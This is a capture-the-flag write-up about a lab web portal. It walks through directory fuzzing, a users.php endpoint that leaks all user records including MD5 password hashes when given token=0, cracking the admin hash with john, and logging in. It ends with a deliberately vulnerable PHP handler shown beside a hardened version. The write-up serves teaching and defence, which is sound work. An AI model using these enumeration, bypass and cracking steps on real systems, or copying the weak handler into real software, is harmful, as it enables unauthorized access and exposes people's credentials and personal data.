Zorromegbia
This challenge focused on a web application and a sub directory. The vulnerability was an exposed internal file, and the system had a writeable file and a CVE that was used for privilege escalation (PE).
nmap
open-port
```text
PORT   STATE SERVICE VERSION
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.67 ((Debian))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: UniversityCTF 2026 Portal
|_http-server-header: Apache/2.4.67 (Debian)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
```
HTTP(80)
Home page (index.php)
login page (login.php)
The page code is solid: it uses PHP on the back-end, and the login page limits login attempts and locks the user's IP for 5 minutes.
FFUF
At first I tried fuzzing it normally with the usual rules, but it needs the -e flag to append file extensions to the requests; with that flag you find the files.
```bash
$ ffuf -u http://uni.ctf/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -e .php,.html,.txt,.bak,.zip
```
The FUZZ results show both files and directories:
```text
index.php
login.php
admin.php
includes
logout.php
.html
```
I focused on the includes folder. It does not respond in the browser or with curl, but when I fuzzed it I found:
```text
data.php
auth.php
```
These files look like the login helper files that hold the password and the authenticator. I tried to look them up, but I could not reach their contents: since they are PHP, requesting them executes the script on the server and returns no output, so whatever they contain is a script that runs inside.
foothold
I tried many things to read the file:

- LFI does not work.
- `?page=../../includes/auth.php` does not work.

After researching, I gave all the information to ChatGPT and it found something I had missed: the token parameter of users.php.

```text
curl -i http://192.168.1.8/users.php
HTTP/1.1 400 Bad Request
Date: Fri, 26 Jun 2026 20:11:11 GMT
Server: Apache/2.4.67 (Debian)
X-Powered-By: PHP/8.2.31
Content-Length: 42
Connection: close
Content-Type: application/json; charset=utf-8

{ "error": "missing token parameter" }
```
This shows that a token parameter is required. I added a token parameter and tried values for it, and the value that worked was 0.
```text
─$ curl -i "http://192.168.1.8/users.php?token=0"
HTTP/1.1 200 OK
Date: Fri, 26 Jun 2026 21:32:47 GMT
Server: Apache/2.4.67 (Debian)
X-Powered-By: PHP/8.2.31
Content-Length: 1567
Content-Type: application/json; charset=utf-8

[ { "id": 2, "username": "admin", "email": "admin@yekolotemari.com", "password": "56b32eb43e6f15395f6c46c1c9e1cd36", "role": "super user", "token": "8024b78f83f102da4f", "name": "Henok Girma", "position": "System Administrator", "dob": "1978-04-26", "start_date": "2021-01-12", "salary": "320800.00" }, …
```
Now we have the admin credentials; the password is stored as an MD5 hash.
```text
└─$ john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
wonderful1       (admin)
1g 0:00:00:00 DONE (2026-06-26 15:48) 1.219g/s 17491Kp/s 17491Kc/s 35004KC/s fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
```
login as Admin
```bash
curl -c cookies.txt -L -d 'username=admin&password=wonderful1' http://192.168.1.8/login.php
```
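The writeup never shows the source of users.php, so as an added example (not the challenge's own code) here is a PHP handler that reproduces what was observed, a gate that only checks the token parameter is present and then dumps every column including the MD5 password hash, beside a hardened version. The `$pdo` connection, the `users` table and its `api_token_hash` column are assumptions for the illustration.

```php
<?php
// Added illustration, not the challenge's users.php. Assumes a PDO connection $pdo
// and a `users` table; the hardened variant also assumes an `api_token_hash` column.

// WEAK (matches the observed behaviour): 400 only when the parameter is absent,
// any value such as token=0 passes, and whole rows (password hash, salary, every
// user's own token) are serialised back to the client.
function users_weak(PDO $pdo): void {
    header('Content-Type: application/json; charset=utf-8');
    if (!isset($_GET['token'])) {
        http_response_code(400);
        echo json_encode(['error' => 'missing token parameter']);
        return;
    }
    echo json_encode($pdo->query('SELECT * FROM users')->fetchAll(PDO::FETCH_ASSOC));
}

// HARDENED: the token must match a stored per-user token hash, compared in
// constant time, the response is scoped to that one user, and secret or
// sensitive columns are never selected in the first place.
function users_hardened(PDO $pdo): void {
    header('Content-Type: application/json; charset=utf-8');
    $token = $_GET['token'] ?? '';
    if (!is_string($token) || strlen($token) < 32 || !ctype_xdigit($token)) {
        http_response_code(400);
        echo json_encode(['error' => 'missing or malformed token parameter']);
        return;
    }
    $tokenHash = hash('sha256', $token);              // stored hashed, like a password
    $stmt = $pdo->prepare(
        'SELECT id, username, email, role, api_token_hash FROM users WHERE api_token_hash = ?'
    );
    $stmt->execute([$tokenHash]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // hash_equals() re-checks the DB match without a timing side channel.
    if ($row === false || !hash_equals($row['api_token_hash'], $tokenHash)) {
        http_response_code(403);
        echo json_encode(['error' => 'invalid token']);
        return;
    }
    unset($row['api_token_hash']);
    echo json_encode($row);
}

// Password storage: password_hash() (salted, slow) instead of unsalted MD5, so a
// leaked row cannot be recovered with a plain wordlist run as the admin hash was.
function store_password(PDO $pdo, int $userId, string $password): void {
    $stmt = $pdo->prepare('UPDATE users SET password = ? WHERE id = ?');
    $stmt->execute([password_hash($password, PASSWORD_DEFAULT), $userId]);
}
```

Detection-wise, the weak gate also leaves a clear trace: a 400 for users.php without a token followed by a 200 with a large JSON body for an arbitrary token value is exactly the access-log pattern to alert on.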



